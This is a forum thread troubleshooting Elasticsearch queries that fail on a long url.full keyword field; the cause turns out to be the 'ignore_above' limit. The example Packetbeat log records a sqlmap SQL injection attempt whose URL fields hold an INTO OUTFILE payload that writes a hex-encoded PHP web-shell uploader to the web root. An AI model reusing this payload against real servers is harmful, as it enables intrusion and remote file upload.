I need help! Elasticsearch does not match my regexp, wildcard, or query_string queries

I am using Elasticsearch 7.8.0 (Build: default/deb/757314695644ea9a1dc2fecd26d1a43856725e65/2020-06-14T19:35:50.234439Z, JVM: 14.0.1) and I have the following document in a Packetbeat index (I have truncated http.response.body.content because of the character limit).

{
        "_index" : "packetbeat-7.8.0-2020.07.01",
        "_type" : "_doc",
        "_id" : "P3LrCHMB2KTf0bW9OD9m",
        "_score" : 0.0,
        "_source" : {
          "source" : {
            "bytes" : 1909,
            "ip" : "10.0.0.2",
            "port" : 56150
          },
          "agent" : {
            "type" : "packetbeat",
            "ephemeral_id" : "47786d95-ac76-40bf-a031-7b7cfe9ba7cc",
            "hostname" : "blueprint-energetic-bear",
            "id" : "8d123479-14f2-4ad4-9617-adc8bcd9f779",
            "version" : "7.8.0",
            "name" : "blueprint-energetic-bear"
          },
          "event" : {
            "dataset" : "http",
            "kind" : "event",
            "timezone" : "+00:00",
            "duration" : 446962000,
            "end" : "2020-07-01T05:48:19.311Z",
            "category" : "network_traffic",
            "start" : "2020-07-01T05:48:18.864Z"
          },
          "@version" : "1",
          "process" : {
            "ppid" : 1492,
            "pid" : 25800,
            "args" : [
              "/usr/sbin/apache2",
              "-k",
              "start"
            ],
            "executable" : "/usr/sbin/apache2",
            "name" : "apache2",
            "start" : "2020-07-01T05:46:27.090Z"
          },
          "server" : {
            "bytes" : 7840,
            "ip" : "10.0.2.128",
            "port" : 80
          },
          "method" : "post",
          "user_agent" : {
            "original" : "sqlmap/1.4.6.12#dev (http://sqlmap.org)"
          },
          "tags" : [
            "beats_input_raw_event"
          ],
          "query" : "POST /php/recherche_old.php",
          "@timestamp" : "2020-07-01T05:48:18.864Z",
          "http" : {
            "request" : {
              "method" : "post",
              "bytes" : 1909,
              "headers" : {
                "content-type" : "application/x-www-form-urlencoded; charset=utf-8",
                "host" : "10.0.2.128",
                "accept" : "*/*",
                "cache-control" : "no-cache",
                "connection" : "close",
                "user-agent" : "sqlmap/1.4.6.12#dev (http://sqlmap.org)",
                "content-length" : 1578,
                "accept-encoding" : "gzip,deflate",
                "cookie" : {
                  "phpsessid" : "begagnst506sh1rq7u0elabda4"
                }
              },
              "body" : {
                "bytes" : 1578
              }
            },
            "response" : {
              "bytes" : 7840,
              "status_phrase" : "ok",
              "status_code" : 200,
              "headers" : {
                "expires" : "Thu, 19 Nov 1981 08:52:00 GMT",
                "content-type" : "text/html; charset=UTF-8",
                "cache-control" : "no-store, no-cache, must-revalidate, post-check=0, pre-check=0",
                "date" : "Wed, 01 Jul 2020 05:48:19 GMT",
                "server" : "Apache/2.4.29 (Ubuntu)",
                "pragma" : "no-cache",
                "connection" : "close",
                "content-length" : 7476,
                "x-powered-by" : "PHP/5.6.40-29+ubuntu18.04.1+deb.sury.org+1"
              },
              "body" : {
                "bytes" : 7476,
                "content" : "..."
              }
            },
            "version" : "1.1"
          },
          "type" : "http",
          "ecs" : {
            "version" : "1.5.0"
          },
          "client" : {
            "bytes" : 1909,
            "ip" : "10.0.0.2",
            "port" : 56150
          },
          "host" : {
            "name" : "blueprint-energetic-bear"
          },
          "status" : "OK",
          "network" : {
            "type" : "ipv4",
            "bytes" : 9749,
            "community_id" : "1:S2jWpKsNyeAykrZPa+4yC6DWBE8=",
            "direction" : "inbound",
            "transport" : "tcp",
            "protocol" : "http"
          },
          "url" : {
            "scheme" : "http",
            "full" : "http://10.0.2.128/php/recherche_old.php?btnRechercher=Rechercher&recherche=dac%27+LIMIT+0%2C1+INTO+OUTFILE+%27%2Fvar%2Fwww%2Fhtml%2Fphp%2Ftmpuyazr.php%27+LINES+TERMINATED+BY+0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f68746d6c2f7068702f3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--+-",
            "domain" : "10.0.2.128",
            "path" : "/php/recherche_old.php",
            "query" : "btnRechercher=Rechercher&recherche=dac%27+LIMIT+0%2C1+INTO+OUTFILE+%27%2Fvar%2Fwww%2Fhtml%2Fphp%2Ftmpuyazr.php%27+LINES+TERMINATED+BY+0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f68746d6c2f7068702f3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--+-"
          },
          "destination" : {
            "bytes" : 7840,
            "process" : {
              "ppid" : 1492,
              "pid" : 25800,
              "args" : [
                "/usr/sbin/apache2",
                "-k",
                "start"
              ],
              "executable" : "/usr/sbin/apache2",
              "name" : "apache2",
              "start" : "2020-07-01T05:46:27.090Z"
            },
            "ip" : "10.0.2.128",
            "port" : 80
          },
          "world" : "blueprint"
        }
      }

Now, if I try to query this document with a regexp, wildcard, or query_string query, I get very strange results. For example, if I query the keyword field url.full with the regex .*recherche=.*LIMIT.*, the query does not match the document, regardless of which of the three query types I use. At first I thought something was wrong with the analyzer and that the field was somehow being tokenized, but the queries cannot even match a pattern such as http.*, which should match even if the field were analyzed with the standard analyzer.
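
For concreteness, the three query types could be written roughly as follows. This is only a sketch: the wildcard pattern is an assumed translation of the regex, and the bodies are built as Python dictionaries simply so that they can be printed as JSON request bodies.

```python
import json

FIELD = "url.full"

# regexp query: the pattern has to match the entire keyword value.
regexp_query = {"regexp": {FIELD: {"value": ".*recherche=.*LIMIT.*"}}}

# wildcard query: "*" stands for any run of characters
# (assumed to be equivalent to the regex above).
wildcard_query = {"wildcard": {FIELD: {"value": "*recherche=*LIMIT*"}}}

# query_string query: a regex is written between forward slashes.
query_string_query = {
    "query_string": {"default_field": FIELD, "query": "/.*recherche=.*LIMIT.*/"}
}

for body in (regexp_query, wildcard_query, query_string_query):
    print(json.dumps({"query": body}, indent=2))
```

Each printed body can be used on its own or placed inside the bool filter of a larger search request.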

I would appreciate any help on the matter!

Thanks for the example doc.
Can you share the exact JSON for the index mapping and the query?
(Just the part for the url.full field will do)

Of course, below is the index mapping for the url field:

"url": {
          "properties": {
            "domain": {
              "type": "keyword",
              "ignore_above": 1024
            },
            "extension": {
              "type": "keyword",
              "ignore_above": 1024
            },
            "fragment": {
              "type": "keyword",
              "ignore_above": 1024
            },
            "full": {
              "type": "keyword",
              "fields": {
                "text": {
                  "type": "text",
                  "norms": false
                }
              },
              "ignore_above": 1024
            },
            "original": {
              "type": "keyword",
              "fields": {
                "text": {
                  "type": "text",
                  "norms": false
                }
              },
              "ignore_above": 1024
            },

And the query can vary depending on whether you use the wildcard, regexp, or query_string query. However, a sample query could look something like:

{
  "size": 100,
  "query": {
    "bool": {
      "filter": [
        {
          "bool": {
            "must": [
              {
                "term": {
                  "agent.type": "packetbeat"
                }
              },
              {
                "term": {
                  "host.name": "blueprint-energetic-bear"
                }
              },
              {
                "term": {
                  "destination.port": 80
                }
              },
              {
                "term": {
                  "http.request.method": "post"
                }
              },
              {
                "term": {
                  "http.response.status_code": "200"
                }
              },
              {
                "query_string": {
                  "default_field": "url.full",
                  "query": "/.*recherche=.*LIMIT.*/"
                }
              }
            ]
          }
        }
      ]
    }
  }
}

Where the query_string can be replaced with any of the other mentioned queries (changing some syntax as well of course). Some regex patterns return the document while others that seem just as valid do not return the document.

Thanks.

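That's the problem: the "ignore_above": 1024 setting on url.full. The URL is 1600 characters long, which is over that limit, so the value is thrown away by this indexing rule. It is never indexed in the keyword field, although it still shows up in _source, which is why no regexp, wildcard, or query_string query on url.full can match it.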
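
The effect of the "ignore_above": 1024 setting in the mapping can be modeled outside Elasticsearch. The sketch below is a simplified model, not Elasticsearch code: the helper names keyword_is_indexed and regexp_would_match are hypothetical, the URLs are made up (a shortened prefix of the real one, padded with "a"), and it assumes that a keyword value longer than ignore_above is skipped at index time.

```python
import re

IGNORE_ABOVE = 1024  # value from the url.full mapping


def keyword_is_indexed(value: str, ignore_above: int = IGNORE_ABOVE) -> bool:
    """Hypothetical helper modeling the ignore_above rule for keyword fields.

    Assumption: a value longer than ignore_above is not indexed at all,
    so no regexp, wildcard, or query_string query can match it.
    """
    return len(value) <= ignore_above


def regexp_would_match(pattern: str, value: str) -> bool:
    """The value must have been indexed AND the pattern must match all of it."""
    if not keyword_is_indexed(value):
        return False
    # Regexp queries match against the whole term, hence fullmatch.
    return re.fullmatch(pattern, value) is not None


# Made-up URLs for illustration only.
prefix = "http://10.0.2.128/php/recherche_old.php?recherche=dac%27+LIMIT+0%2C1+"
short_url = prefix + "a" * (200 - len(prefix))
long_url = prefix + "a" * (1600 - len(prefix))

pattern = r".*recherche=.*LIMIT.*"
print(len(short_url), regexp_would_match(pattern, short_url))  # 200 True
print(len(long_url), regexp_would_match(pattern, long_url))    # 1600 False
```

In this model the pattern is valid for both URLs, and only the length decides whether the document can be found. That would also explain why only some documents are affected.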

Thank you so much Mark! This has been driving me crazy since yesterday!
